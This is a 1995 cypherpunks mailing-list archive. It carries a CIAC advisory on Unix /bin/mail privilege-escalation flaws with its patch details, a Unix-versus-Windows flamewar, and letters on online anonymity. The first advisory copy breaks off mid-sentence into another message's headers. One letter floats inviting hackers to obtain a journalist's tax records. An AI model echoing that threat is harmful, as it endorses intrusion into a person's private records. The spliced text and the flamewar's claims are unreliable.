To: cypherpunks@toad.com
Subject: CIAC Bulletin F-09
Message-ID: <199501272017.PAA12611@pipe4.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   [Note: Document reformated for mailing by jya@pipeline.com.  
   If in doubt contact CIAC for original: 
   ciac.llnl.gov:/pub/ciac/bulletin/f-fy95/f-09.ciac.(doc).] 
 
   ________________________________________________________ 
 
                   The U.S. Department of Energy 
               Computer Incident Advisory Capability 
                   ___  __ __    _     ___ 
                  /       |     /_\   / 
                  \___  __|__  /   \  \___ 
     _________________________________________________________ 
 
                       INFORMATION BULLETIN 
 
                  Unix /bin/mail Vulnerabilities 
 
   January 27, 1995 1030 PST                     Number F-09 
   _________________________________________________________ 
 
   PROBLEM:   The Unix /bin/mail utility contains security 
              vulnerabilities. 
 
 
   PLATFORMS: DEC OSF/1 1.2, 1.3, and 2.0 
              DEC Ultrix 4.3, 4.3A, and 4.4 
              SCO Unix System V/386 Release 3.2 OS Version 
              4.2 
              SCO Open Desktop Lite Release 3.0 
              SCO Open Desktop Release 3.0 
              SCO Open Server Enterprise System Release 3.0 
              SCO Open Server Network System Release 3.0 
              Solbourne OS4.1x 
              SunOS 4.x 
 
 
   DAMAGE:    Local users may gain privileged (root) access. 
 
 
   SOLUTION:  Apply appropriate vendor patch as described 
              below. 
   _________________________________________________________ 
 
 
   VULNERABILITY 
   ASSESSMENT The vulnerabilities in the /bin/mail program 
              have been openly discussed in several Internet 
              forums, and automated scripts exploiting the 
              vulnerabilities have been widely distributed. 
              These tools have been used in many recent 
              attacks.  CIAC recommends sites install these 
              patches as soon as possible. 
   _________________________________________________________ 
 
 
   Critical Information about Unix /bin/mail Vulnerabilities 
 
 
   The /bin/mail utility on several Unix versions based on BSD 
   4.3 Unix contain a security vulnerability.  The 
   vulnerability is the result of race conditions that exist 
   during the delivery of messages to local users.  These race 
   conditions will allow intruders to create or modify files 
   on the system, resulting in privileged access to the 
   system. 
 
 
   Below is a summary of systems known to be either vulnerable 
   or not vulnerable.  If your vendor's name is not listed, 
   please contact the vendor or CIAC for more information. 
 
   Vendor or Source                   Status 
   ----------------                   ------------ 
   Apple Computer, Inc.               Not vulnerable 
   Berkeley SW Design, Inc. (BSDI)    Not vulnerable 
   Cray Research, Inc.                Not vulnerable 
   Data General Corp.                 Not vulnerable       
   Digital Equipment Corp.            Vulnerable 
   FreeBSD                            Not vulnerable 
   Harris                             Not vulnerable 
   IBM                                Not vulnerable  
   NetBSD                             Not vulnerable 
   NeXT, Inc.                         Not vulnerable  
   Pyramid                            Not vulnerable 
   The Santa Cruz Operation (SCO)     Vulnerable 
   Solbourne (Grumman)                Vulnerable 
   Sun Microsystems, Inc.             SunOS 4.x vulnerable 
                                      Solaris 2.x not         
                                      vulnerable 
 
   Patch Information 
   ----------------- 
 
   DEC        The /bin/mail patch is a part of a 
              comprehensive Security Enhanced Kit that 
              addresses other security problems as well. This 
              kit was released on May 17, 1994 and was 
              described in DEC Security Advisory #0505 and 
              CIAC Notes 94-03. 
 
 
              OSF/1 users should upgrade to a minimum of 
              version 2.0 and install Security Enhanced Kit 
              CSCPAT_4061 v1.0.  Ultrix users should upgrade 
              to at least version 4.4 and install Security 
              Enhanced Kit CSCPAT_4060 v1.0. 
 
 
              Both kits are available from your Digital 
              support channel or electronically by request 
              via DSNlink. 
 
 
   SCO        Vulnerabilities in SCO's /bin/mail utility are 
              removed by applying SCO's Support Level 
              Supplement (SLS) uod392a. It is available via 
              anonymous FTP from ftp.sco.com in the /SLS 
              directory: 
 
   Description   Filename       MD5 Checksum 
   -----------   ------------   -------------------------------- 
   Disk image    uod392a.Z      2c26669d89f61174f751774115f367a5 
 
   Cover letter  uod392a.ltr.Z  52db39424d5d23576e065af2b80aee49 
 
 
Solbourne     Grumman System Support Corporation now performs 
              all Solbourne software and hardware support.  
              Please contact them for further information: 
 
              E-mail: support@nts.gssc.com 
              Phone:  1-800-447-2861 
              FTP:    ftp.nts.gssc.com 
 
 
Sun           Sun has made patches available to remove 
              vulnerabilities in /bin/mail.  These patches 
              address all vulnerabilities CIAC has seen 
              exploited to date, and CIAC recommends they be 
              installed. However, the patches will be updated 
              again in the near future to remove additional 
              vulnerabilities that have recently come to 
              light.  CIAC will announce the availability of 
              the new patches when they are released. 
 
 
              The patches may be obtained from your local Sun 
              Answer Center or through anonymous FTP from 
              sunsolve1.sun.com in the /pub/patches 
              directory: 
 
   SunOS    Filename         MD5 Checksum 
   -------  ---------------  -------------------------------- 
   4.1.x    100224-13.tar.Z  90a507017a1a40c4622b3f1f00ce5d2d 
 
   4.1.3U1  101436-08.tar.Z  0e64560edc61eb4b3da81a932e8b11e1 
                  
 
   Alternative Solution 
   -------------------- 
 
   For those sites unable to obtain a vendor patch From owner-cypherpunks  Fri Jan 27 13:19:28 1995
Return-Path: <owner-cypherpunks>
Received: by toad.com id AA15273; Fri, 27 Jan 95 13:19:28 PST
Received: from gateway.informix.com by toad.com id AA15259; Fri, 27 Jan 95 13:19:22 PST
Received: from informix.com (infmx.informix.com) by gateway.informix.com (4.1/SMI-4.1)
	id AA10439; Fri, 27 Jan 95 13:19:16 PST
Received: from carbon.informix.com by informix.com (4.1/SMI-4.1)
	id AA02110; Fri, 27 Jan 95 13:19:08 PST
Received: by carbon.informix.com (5.0/SMI-SVR4)
	id AA00461; Fri, 27 Jan 1995 13:19:01 +0800
Date: Fri, 27 Jan 1995 13:19:01 +0800
From: jamesd@com.informix.com
Message-Id: <9501272119.AA00461@carbon.informix.com>
Subject: Oops, Correction: one big error in "Even more unix holy war." 
Apparently-To: perry@imsi.com
Apparently-To: sdw@lig.net
Apparently-To: wmo@digibd.com
Apparently-To: cypherpunks@toad.com
Content-Length: 2646
Sender: owner-cypherpunks@toad.com
Precedence: bulk

I wrote:
> The great strength is of course symbolic debugging -- you can
> single step your compiled code, and see it displayed symbolicly,
> with the symbols and statements of your source code,
> and with the contents memory displayed in terms of your
> source code variables.

On this I was of course totally wrong:

Unix has symbolic debugging equal to DOS/Windows.
I was under the false impression that it only had
C code interpretation.

This is an error -- what I said was true for C++, but 
then in Windows we too are forced to primarily use
interpretation to debug C++.   C++ symbolic debuggers
are not up to acceptable capabilities in either system.

Sorry.

But my statement concerning internationalization and
resource files was correct.

Unix has no equivalent of App Studio, etc.  I have made
a little tour of people in my company who work on both
unix and Windows.  I (fortunately) work primarily on
Windows, as you may have guessed.

The company I presently work for is making a tool they
call Window Painter.  This is in some respects similar
to App Studio.  It works with their unix database 
language.

But it is no App Studio, as the unix folk who are
working on it freely admit, those few of them that
have used App Studio.

Most of my correspondents had replies along the lines
of "Huh -- internationalization -- what source code
tools could possibly help you with internationalization."

Others listed irregular bands of random unix tools which
are essentially irrelevant to the problem of 
internationalization.

Most international unix programs have string files
that the compiled program refers to a string by a number, and
a font size by a number, and the position of the button
on screen by a number -- site customizable information,
Xdefaults, *.cfg

This is functionally equivalent to the Windows Resource
file, in that in principle one can keep translatable elements
separate from source code.  But is certainly not equivalent 
in ease of use.  One can do the job, but in essense one
does it by hand.

Resource files, and dialog box editing tools such as App Studio,
provide a clean separation between visual user interface
elements that typically require translation, and functiona
code that does not.

 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bill O'Hanlon" <wmo@digibd.com>
Date: Fri, 27 Jan 95 14:05:18 PST
To: jamesd@com.informix.com
Subject: Re: Oops, Correction: one big error in "Even more unix holy war."
In-Reply-To: <9501272119.AA00461@carbon.informix.com>
Message-ID: <9501272204.AA27636@poe.digibd.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 27 Jan 1995 13:19:01 +0800  jamesd@com.informix.com wrote:
--------
> > source code variables.
> 
> On this I was of course totally wrong:
> 
> Unix has symbolic debugging equal to DOS/Windows.
> I was under the false impression that it only had
> C code interpretation.
> 
> This is an error -- what I said was true for C++, but 
> then in Windows we too are forced to primarily use
> interpretation to debug C++.   C++ symbolic debuggers
> are not up to acceptable capabilities in either system.
> 
> Sorry.

It just gets worse and worse.

James, the debugging environment I've been referring to, and the product
I've been debugging is written in C++.  Let me be perfectly clear, here:

The product is an embedded processor.
I'm running a development environment on a Sun workstation.
The code running on the processor is written in C++.
The debugger is a symbolic debugger, and it can do breakpoints on lines of
code, displays of expressions involving symbolic names, and all of the other
points about debuggers that I recall you making.
The code uses all C++ features quite heavily.
There is no C or C++ interpretation involved.
The environment is freely available.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Acklin <hroller@metronet.com>
Date: Fri, 27 Jan 95 14:09:24 PST
To: cypherpunks@toad.com
Subject: CIAC Bulletin F-09: Unix /bin/mail Vulnerability (fwd)
Message-ID: <Pine.HPP.3.90.950127160855.15913A-100000@fohnix.metronet.com>
MIME-Version: 1.0
Content-Type: text/plain


Just got this in the mail and thought I would share it with all of you...

---------- Forwarded message ----------
Date: Fri, 27 Jan 1995 11:16:55 -0800
From: Steve Weeber <weeber@eek.llnl.gov>
To: hroller@metronet.com
Subject: CIAC Bulletin F-09: Unix /bin/mail Vulnerability

            _____________________________________________________
                       The U.S. Department of Energy
                    Computer Incident Advisory Capability
                           ___  __ __    _     ___
                          /       |     /_\   /
                          \___  __|__  /   \  \___
            _____________________________________________________

                            INFORMATION BULLETIN

                       Unix /bin/mail Vulnerabilities

January 27, 1995 1030 PST                                        Number F-09
_____________________________________________________________________________

PROBLEM:       The Unix /bin/mail utility contains security vulnerabilities.
PLATFORMS:     DEC OSF/1 1.2, 1.3, and 2.0
               DEC Ultrix 4.3, 4.3A, and 4.4
               SCO Unix System V/386 Release 3.2 OS Version 4.2
               SCO Open Desktop Lite Release 3.0
               SCO Open Desktop Release 3.0
               SCO Open Server Enterprise System Release 3.0
               SCO Open Server Network System Release 3.0
               Solbourne OS4.1x
               SunOS 4.x
DAMAGE:        Local users may gain privileged (root) access.
SOLUTION:      Apply appropriate vendor patch as described below.
_____________________________________________________________________________

VULNERABILITY  The vulnerabilities in the /bin/mail program have been openly
ASSESSMENT:    discussed in several Internet forums, and automated scripts
               exploiting the vulnerabilities have been widely distributed.
               These tools have been used in many recent attacks.  CIAC
               recommends sites install these patches as soon as possible.
_____________________________________________________________________________

          Critical Information about Unix /bin/mail Vulnerabilities

The /bin/mail utility on several Unix versions based on BSD 4.3 Unix contain
a security vulnerability.  The vulnerability is the result of race conditions
that exist during the delivery of messages to local users.  These race
conditions will allow intruders to create or modify files on the system,
resulting in privileged access to the system.

Below is a summary of systems known to be either vulnerable or not
vulnerable.  If your vendor's name is not listed, please contact the vendor
or CIAC for more information.

   Vendor or Source                   Status
   ----------------                   ------------
   Apple Computer, Inc.               Not vulnerable
   Berkeley SW Design, Inc. (BSDI)    Not vulnerable
   Cray Research, Inc.                Not vulnerable
   Data General Corp.                 Not vulnerable      
   Digital Equipment Corp.            Vulnerable
   FreeBSD                            Not vulnerable
   Harris                             Not vulnerable
   IBM                                Not vulnerable 
   NetBSD                             Not vulnerable
   NeXT, Inc.                         Not vulnerable 
   Pyramid                            Not vulnerable
   The Santa Cruz Operation (SCO)     Vulnerable
   Solbourne (Grumman)                Vulnerable
   Sun Microsystems, Inc.             SunOS 4.x vulnerable
                                      Solaris 2.x not vulnerable

Patch Information
-----------------

DEC          The /bin/mail patch is a part of a comprehensive Security
             Enhanced Kit that addresses other security problems as well.
             This kit was released on May 17, 1994 and was described in
             DEC Security Advisory #0505 and CIAC Notes 94-03.

             OSF/1 users should upgrade to a minimum of version 2.0 and
             install Security Enhanced Kit CSCPAT_4061 v1.0.  Ultrix users
             should upgrade to at least version 4.4 and install Security
             Enhanced Kit CSCPAT_4060 v1.0.

             Both kits are available from your Digital support channel or
             electronically by request via DSNlink.


SCO          Vulnerabilities in SCO's /bin/mail utility are removed by
             applying SCO's Support Level Supplement (SLS) uod392a. It is
             available via anonymous FTP from ftp.sco.com in the /SLS
             directory:

             Description   Filename       MD5 Checksum
             ------------  -------------  --------------------------------
             Disk image    uod392a.Z      2c26669d89f61174f751774115f367a5
             Cover letter  uod392a.ltr.Z  52db39424d5d23576e065af2b80aee49


Solbourne    Grumman System Support Corporation now performs all Solbourne
             software and hardware support.  Please contact them for
             further information:

                E-mail: support@nts.gssc.com
                Phone:  1-800-447-2861
                FTP:    ftp.nts.gssc.com


Sun          Sun has made patches available to remove vulnerabilities in
             /bin/mail.  These patches address all vulnerabilities CIAC has
             seen exploited to date, and CIAC recommends they be installed.
             However, the patches will be updated again in the near future
             to remove additional vulnerabilities that have recently come
             to light.  CIAC will announce the availability of the new
             patches when they are released.

             The patches may be obtained from your local Sun Answer Center
             or through anonymous FTP from sunsolve1.sun.com in the
             /pub/patches directory:

             SunOS    Filename         MD5 Checksum
             -------  ---------------  --------------------------------
             4.1.x    100224-13.tar.Z  90a507017a1a40c4622b3f1f00ce5d2d
             4.1.3U1  101436-08.tar.Z  0e64560edc61eb4b3da81a932e8b11e1
                 

Alternative Solution
--------------------

For those sites unable to obtain a vendor patch for a vulnerable version of
/bin/mail, a replacement package called mail.local has been developed and
made freely available on the Internet.  The /bin/mail program is relatively
complex software, serving both as a mail delivery agent and a user interface,
allowing users to send and read E-mail messages.  Complex system software,
like /bin/mail, is more likely to exhibit security vulnerabilities.

The mail.local package was written to perform only one task: the delivery
of mail to local users.  It is comparatively small, and the code has been
examined carefully by experts in the security community.  While it has not
been formally evaluated, it is probable that mail.local addresses all
vulnerabilities currently being exploited in /bin/mail.

For more information, see the file README in the directory
ftp://coast.cs.purdue.edu/pub/tools/unix/mail.local/.

_____________________________________________________________________________

CIAC wishes to acknowledge the contributions of the CERT Coordination
Center in the construction of this bulletin.
_____________________________________________________________________________

For emergencies and off-hour assistance, DOE and DOE contractor sites can
contact CIAC 24-hours a day via an integrated voicemail and SKYPAGE number.
To use this service, dial 1-510-422-8193 or 1-800-759-7243 (SKYPAGE). The
primary SKYPAGE PIN number, 8550070 is for the CIAC duty person. A second
PIN, 8550074 is for the CIAC Project Leader.  CIAC's FAX number is
510-423-8002, and the STU-III number is 510-423-2604.  Send E-mail to
ciac@llnl.gov.

Previous CIAC notices, anti-virus software, and other information are
available on the Internet via anonymous FTP from ciac.llnl.gov (IP address
128.115.19.53).

CIAC has several self-subscribing mailing lists for electronic publications:
1.  CIAC-BULLETIN for Advisories, highest priority - time critical
    information, and Bulletins, important computer security information;
2.  CIAC-NOTES for Notes, a collection of computer security articles;
3.  SPI-ANNOUNCE for official news about Security Profile Inspector (SPI)
    software updates, new features, distribution and availability;
4.  SPI-NOTES, for discussion of problems and solutions regarding the use of
    SPI products.

Our mailing lists are managed by a public domain software package called
ListProcessor, which ignores E-mail header subject lines. To subscribe (add
yourself) to one of our mailing lists, send requests of the following form:

subscribe list-name LastName, FirstName PhoneNumber

as the E-mail message body, substituting CIAC-BULLETIN, CIAC-NOTES,
SPI-ANNOUNCE or SPI-NOTES for "list-name" and valid information for
"LastName" "FirstName" and "PhoneNumber."  Send to: ciac-listproc@llnl.gov
not to: ciac@llnl.gov

e.g.,
subscribe ciac-notes O'Hara, Scarlett 404-555-1212 x36
subscribe ciac-bulletin O'Hara, Scarlett 404-555-1212 x36

You will receive an acknowledgment containing address and initial PIN, and
information on how to change either of them, cancel your subscription, or get
help.
_____________________________________________________________________________

PLEASE NOTE: Many users outside of the DOE and ESnet computing communities
receive CIAC bulletins. If you are not part of these communities, please
contact your agency's response team to report incidents. Your agency's team
will coordinate with CIAC. The Forum of Incident Response and Security Teams
(FIRST) is a world-wide organization. A list of FIRST member organizations
and their constituencies can be obtained by sending E-mail to
first-request@first.org with an empty subject line and a message body
containing the line: send first-contacts.

This document was prepared as an account of work sponsored by an agency of
the United States Government. Neither the United States Government nor the
University of California nor any of their employees, makes any warranty,
expressed or implied, or assumes any legal liability or responsibility for
the accuracy, completeness, or usefulness of any information, product, or
process disclosed, or represents that its use would not infringe privately
owned rights. Reference herein to any specific commercial products, process,
or service by trade name, trademark manufacturer, or otherwise, does not
necessarily constitute or imply its endorsement, recommendation, or favoring
by the United States Government or the University of California. The views
and opinions of authors expressed herein do not necessarily state or reflect
those of the United States Government nor the University of California, and
shall not be used for advertising or product endorsement purposes.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@vail.tivoli.com (Mike McNally)
Date: Fri, 27 Jan 95 14:35:59 PST
To: cypherpunks@toad.com
Subject: Oops, Correction: one big error in "Even more unix holy war."
In-Reply-To: <9501272119.AA00461@carbon.informix.com>
Message-ID: <9501272235.AA05861@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain



jamesd@com.informix.com writes:
 > This is an error -- what I said was true for C++, but 
 > then in Windows we too are forced to primarily use
 > interpretation to debug C++.   C++ symbolic debuggers
 > are not up to acceptable capabilities in either system.

I hate to contribute to this silliness, but I can't let blatant errors
like this pass.  I debug reams of C++ daily on a wide variety of UNIX
platforms.  With real symbols.  With real C++ expression evaluation an
overload resolution.

(I also get to use compilers that actually come close to supporting
the language as defined by the ARM.)

| GOOD TIME FOR MOVIE - GOING ||| Mike McNally <m5@tivoli.com>       |
| TAKE TWA TO CAIRO.          ||| Tivoli Systems, Austin, TX:        |
|     (actual fortune cookie) ||| "Like A Little Bit of Semi-Heaven" |




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 27 Jan 95 13:45:14 PST
To: cypherpunks@toad.com
Subject: Re: Wall Street Journal Article
Message-ID: <v01510101ab4eced6779b@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:39 AM 1/27/95, Dale Harrison (AEGIS wrote:
>There was an interesting article in Thursday's Wall Street
>Journal calling for the end of anonymous communications on the Internet.
>It is on page B1 under the "Personal Technology" column and was written
>by Walter Mossberg (mossberg@wsj.com) who invites comment.

This Mossberg guy, to quote Mrs. Slocumb, really gets up my nose.

With apologies to the last flamewar's participants and MicroSquish
partisans, this bozoid monstrosity has historically demonstrated his
cluelessness and is living proof that no one got fired by buying IBM *and*
Microsoft.

Every few weeks this clown shows up on the Paper of Record for the
Plutocracy of the Planet and positively warps space with his inaccuracies.

He probably learned to code in COBOL. He probably calls a microcomputer a
"terminal".  He probably calls a server a "host". He probably even has grey
hair... ;-).

The brain bleeds. The mouth froths.

Somebody needs to feed this guy's email address to Detweiler with the "tip"
that he's a tenticle of someone around here who's actually cluefull ...

Cheers,
Bob Hettinga





-----------------
Robert Hettinga  (rah@shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                       snakes." -- Bertrand Russell
(617) 323-7923






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Fri, 27 Jan 95 13:49:53 PST
To: mossberg@wsj.com
Subject: anon communication
Message-ID: <199501272148.QAA00597@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain


Re: anon communications

Hello...

There are many reason that anonymous communications are needed,
I will just focus briefly on one that is important to our business.

When we post jobs on the Internet we need to remain anonymous. We
do this when we place ads in the NY Times as well.

This is just one reason why anonymous communication on the Internet
is very important.

Harry Hawk
Manager of Computer Services
Warwick Baker & Fiore
212 941 4438
habs@warwick.com

/hawk



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 27 Jan 95 18:09:08 PST
To: storm@ssnet.com
Subject: Re: Starting a remailer
In-Reply-To: <Zc8AlKJXYPcE078yn@ssnet.com>
Message-ID: <199501280155.RAA07704@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> Two questions:
> 
> Since I've only limited bucks but have certain needs, can I get a
> package deal on a remailer shell account and the MX service?  What
> I'd like is to have all mail to xxxx@myname.com to be forwarded to
> my shell account no matter what xxxx is.  Preserving the xxxx, though.

	If you are getting MX service forwarded to a local account
that will cost you only $5/month. So everything you want would cost
$15/month plus $40 startup for the domain.

> 
> Given the goal of limiting remailer liability, what about having
> them be anonymous?  Instead of send you a check, send an unidentified
> money order.  This would even allow ownership to change on a frequent
> basis without the system owner knowing who the current operator is.

	Yes, Community ConneXion accepts unidentified payment for
accounts.

-- 
sameer						Voice:   510-841-2014
Network Administrator				Pager:	 510-321-1014
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-549-1383
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 27 Jan 95 15:20:33 PST
To: cypherpunks@toad.com
Subject: DONT READ -- Continuing James Donald flamewar
In-Reply-To: <9501272119.AA00461@carbon.informix.com>
Message-ID: <9501272320.AA20155@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



DONT READ THIS UNLESS YOU GIVE A DAMN ABOUT JAMES DONALD'S "OPINION"
OF UNIX -- HIT DELETE NOW.

jamesd@com.informix.com says:
> But my statement concerning internationalization and
> resource files was correct.

Nope, sorry.

Posix defines these things called "Locales". They provide automatic
and seamless support for things like changing currency symbols, date
formats, fonts, etc. The X windows system has full support for
internationalization in most of its widget sets, too.

> I have made a little tour of people in my company who work on both
> unix and Windows.

Sorry that you don't work with people who know about these things, but
ignorance is not equivalent to absence.

Frankly, I have yet to see a single statement from you that actually
bore some relationship to reality. The most devistating comment you
seem to be able to come up with about why Unix is bad is that make --
an application that doesn't even come with DOS -- used to have some
places where it required tabs. 

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 27 Jan 95 15:28:16 PST
To: "James A. Donald" <jamesd@netcom.com>
Subject: JAMES DONALD FLAME WAR CONTINUED -- DELETE BEFORE READING
In-Reply-To: <Pine.3.89.9501271325.A23224-0100000@netcom10>
Message-ID: <9501272327.AA20166@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



JAMES DONALD FLAME WAR CONTINUED -- DELETE BEFORE READING

"James A. Donald" says:
> On Fri, 27 Jan 1995, Perry E. Metzger wrote:
> > In Unix, I can use a single command to delete an entire file tree --
> > rm -r. In DOS, I have to delete each directory by hand.
> 
> Use the command deltree /y.

It didn't exist until recently. Neither did utilities for moving
around files or directories.

> Or any of the cool third party
> utilities, or the windows file manager which offers a true
> hierarchical view unlike the hierarchical view offered by
> the sun OS file manager.

Oooh, sorry. You don't get to have it both ways. If you can talk about
third party utilities, then I get to point out that there are dozens
of cool third party file browsers. If I don't get to talk about third
party software, then you don't either.

> > DOS doesn't even have a make utility -- perhaps you should do without
> > using make ever again, as DOS is obviously superior.
> 
> I wonder how I have been compiling my files all these years.

With make from third parties. If you want make on unix to do something
different, you can just get the sources (for free usually) and get it
do do anything you like.

And guess, by the way, where make was invented -- hint: not Microsoft.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Fri, 27 Jan 95 19:00:05 PST
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: DONT READ -- Continuing James Donald flamewar
In-Reply-To: <9501272320.AA20155@snark.imsi.com>
Message-ID: <Pine.3.89.9501271848.A29134-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 27 Jan 1995, Perry E. Metzger wrote:
> 
> DONT READ THIS UNLESS YOU GIVE A DAMN ABOUT JAMES DONALD'S "OPINION"
> OF UNIX -- HIT DELETE NOW.
> 
> jamesd@com.informix.com says:
> > But my statement concerning internationalization and
> > resource files was correct.
> 
> Nope, sorry.
> 
> Posix defines these things called "Locales". They provide automatic
> and seamless support for things like changing currency symbols, date
> formats, fonts, etc. The X windows system has full support for
> internationalization in most of its widget sets, too.

I know what a Locale is:

The fact that you confuse this with the internationalization
problem shows that most unix folk have no tools for this problem,
so that the idea of tools that address it is inconceivable
to them.

Typical primitive unix mentality.   I would expect no better
of someone who is unaware that the times have changed since
the days when the PC world did not have make files (because
our programs were so small we did not need them.)

I will explain this to you in simple terms:

To facilitate internationalization, everything that is 
translatable, for example dialogs, buttons, etc, has to
be in one set of files, and everything that should not
be translated needs to be in another set of files.

If you do this by hand you get an immense number of
connections between the two file sets, and the possibility
of many subtle bugs being introduced when one set
of files is translated.

Therefore your tools for painting dialog boxes and menus etc.
must work in such a way as to facilitate separation and 
translation, which is done in windows by having *.rc files
that get translated, and *.c files that do not.

In Unix each company seems to have its own hand rolled tools
to accomplish this task, or no tools at all -- they do it
by hand.

(Somebody sent me a letter saying that Next Step supports
graphical editing of dialog boxes.  While this is an important
part of internationalizability, it is not internationalizability.

For example Visual Basic also supports graphical editing of dialog boxes,
yet it does not support internationalization in the way that
App Studio and Resource Workshop do.)

> Frankly, I have yet to see a single statement from you that actually
> bore some relationship to reality. The most devistating comment you
> seem to be able to come up with about why Unix is bad is that make --
> an application that doesn't even come with DOS -- used to have some
> places where it required tabs. 

You display profound ignorance Perry

We in the DOS world have been using make ever since we had enough
memory to make it worth while.

Furthermore the "make" bug that I complained of, shows typical unix
shoddiness.  Unix tools have sharp edges in the wrong places.

It is these unexpected sharp edges, like chain saw with no
handle, that make unix hard to use.

 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: craig@passport.ca (Craig Hubley)
Date: Fri, 27 Jan 95 16:13:05 PST
To: mossberg@wsj.com
Subject: anonymous mailing
Message-ID: <m0rY0ml-0002H4C@forged.passport.ca>
MIME-Version: 1.0
Content-Type: text/plain


Since you invite comment:

You seem to think that anoynimity can be separated from privacy itself.
Anoynimity was an accidental feature of the telephone system that was
only recently eliminated.  Now, it seems, that those who seek control
over others have realized that it could be eliminated in other media
as well (why not routinely fingerprint everyone, and dust all postal
mail for fingerprints? More practically, why not earmark every transaction
on the Reuters feed?  Or credit every article in the Economist?).  But
even these fundamental disruptions to basic institutions are dwarfed by
the threat to individual confidence to speak out and not fear retribution,
in a world with so many laws that everyone is breaking one or another...

Consider this:  Given the speed and efficiency with which data
can be gathered over the networks, including levels of traffic between
entitites (often the most useful data for purposes of spying on them),
it could be a matter of a short time before a complete dossier of our
motions and associations is in the hands of every lawful authority,
every service provider, and every brother in law of either, and for sale
to the highest bidder - note that most complaints against "hackers" that
dig up private data concern attacks against large data banks (e.g. bank
records).  We might question the buildup of these data banks that make
us so vulnerable to invasions of privacy, rather than those who invade.

I am pondering whether to put a standing offer out in this feared "hacker"
community for your tax records.  If I received no takers for the challenge,
I am confident that it would not be due to lack of ability, but because
they respect your rights more than your respect theirs.  That is, ours.
That is, yours.

There is no need to protect my name in this case, but only because it
seems clear to me that a majority of those who understand this issue,
stand on my side.  If we ever become a minority I may feel less confident,
and then anoynimity may make the difference between speaking out alone or
not at all.  Extinguish the "lone anonymous voice" from electronic media,
which is the mainstream in which commerce is done and thoughts develop,
and you might as well have extinguished the pamphleteer from the American
Revolution.  In fact, you *will* have extinguished him.  I hope you have
something to replace him with:  Universal tolerance ?  Spiritual nirvana?
How do you propose to protect the lone citizen with an unpopular view who
is not yet numerous enough to command a seat in Congress.

Craig Hubley                Business that runs on knowledge
Craig Hubley & Associates   needs software that runs on the net
craig@passport.ca   416-778-6136  416-778-1965 FAX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: storm@marlin.ssnet.com (Don Melvin)
Date: Fri, 27 Jan 95 17:21:25 PST
To: cypherpunks@toad.com
Subject: Re: Clinton freezes U.S. assets of Mideast groups
In-Reply-To: <Pine.3.89.9501241122.A12422-0100000@netcom10>
Message-ID: <rRPAlKJXY5f9078yn@ssnet.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <Pine.3.89.9501241122.A12422-0100000@netcom10>,
"James A. Donald" <jamesd@netcom.com> wrote:
> 
> At present it seems to me that unix machines on the internet
> are intrinsicly insecure -- the methods used to secure them
> are a collection of ad hoc patches.  For example all
> unix machines are vulnerable to the trojan
> horse attack.

Actually, I don't believe that HFS's B3 Unix is vulnerable to this.
And I understand that it is not available in a shrinkwrap version
for the '486.  I do not know if it is a restricted purchase item,
though.  I know it can't be exported with out license.

On the other hand, it's also multi-K$. :-(

> (I expect the usual flame from Perry that I am stupifyingly
> ignorant and that that is all fixed or will be shortly 
> -- no Perry it is not all fixed -- it cannot be fixed.  
> The necessary fixes have to be designed in at the
> beginning.)

True.  But they did build it in from the beginning. :-)

--
America - a country so rich and so strong we can reward the lazy 
          and punish the productive and still survive (so far)

Don Melvin                  storm@ssnet.com                finger for PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: craig@passport.ca (Craig Hubley)
Date: Fri, 27 Jan 95 16:59:38 PST
To: cypherpunks@toad.com
Subject: Shut up already - James Donald does not even exist...
Message-ID: <m0rY1W7-0002H4C@forged.passport.ca>
MIME-Version: 1.0
Content-Type: text/plain


James Donald does not exist.  We can stop the flame war now.  Trying to
be a good net.citizen, I sent "him" e-mail to correct one of "his" line-
noise-quality opinions quietly (so he might shut up) - has no one else
tried this?  It bounced, failing to resolve host which does not usually
happen here if the site is real.  So I submit the following as evidence
that "he" does not exist:

- com.informix.com does not seem real.

- no living human being could hold such opinions and simultaneously operate
  his vital organs (i.e. the level of intelligence implied by his "opinions"
  is even lower than that necessary to support breathing and digestion)

